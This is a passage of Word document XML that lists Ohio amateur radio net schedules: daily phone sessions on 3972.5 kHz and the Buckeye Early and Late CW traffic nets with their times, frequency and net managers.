              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>10:30 AM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6265916E" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">3972.5 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>KHz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2704" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:right w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6D890DE3" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>every day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="363CA3DD" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2429" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="562150CC" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>Afternoon session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="57258F5B" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>4:15 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56F96974" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">3972.5 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>KHz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2704" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:right w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="394F6759" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>every day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="07AA3DE4" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2429" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4F6729A7" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>Evening session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1725" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="43B5D9BD" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>6:00 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1695" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="326EFAFB" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve">3972.5 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>KHz</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2704" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:bottom w:val="double" w:sz="1" w:space="0" w:color="008000"/>
              <w:right w:val="double" w:sz="1" w:space="0" w:color="008000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="669F486C" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressLineNumbers/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>every day</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="29150176" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>Mike, KC8WH is the OSSBN Net Manager. Note time change because of propagation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25E5D719" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D799BA4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B5211F">
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
        <w:t>OHIO HF CW TRAFFIC NETS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D54E04F" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:suppressAutoHyphens/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:kern w:val="1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1136" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:top w:w="55" w:type="dxa"/>
          <w:left w:w="55" w:type="dxa"/>
          <w:bottom w:w="55" w:type="dxa"/>
          <w:right w:w="55" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="0000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1950"/>
        <w:gridCol w:w="1815"/>
        <w:gridCol w:w="2055"/>
        <w:gridCol w:w="2578"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="7C0CAAC4" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7C2E08BE" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>HF CW NETS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1815" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D125D42" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>NET TIMES</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="149066C0" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>FREQUENCY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2578" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="02C288F4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>NET MANAGERS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="7E811EE9" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0D000EE7" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t xml:space="preserve"> Buckeye Early</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1815" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56487B79" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>6:45 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="35B5BCB4" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>3.580</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2578" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="181526E0" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>N2LC</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B5211F" w:rsidRPr="00B5211F" w14:paraId="7A7AE509" w14:textId="77777777" w:rsidTr="000874F3">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1950" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A8BD20C" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>Buckeye Late</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1815" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2105E483" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B5211F">
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:kern w:val="1"/>
              </w:rPr>
              <w:t>10:00 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2055" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="1" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="1" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7A1C3A5F" w14:textId="77777777" w:rsidR="00B5211F" w:rsidRPr="00B5211F" w:rsidRDefault="00B5211F" w:rsidP="00B5211F">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:suppressAutoHyphens/>
              <w:snapToGrid w:val="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Lucida Sans Unicode"/>
                <w:b/>
                <w:color w:val="000000"/>
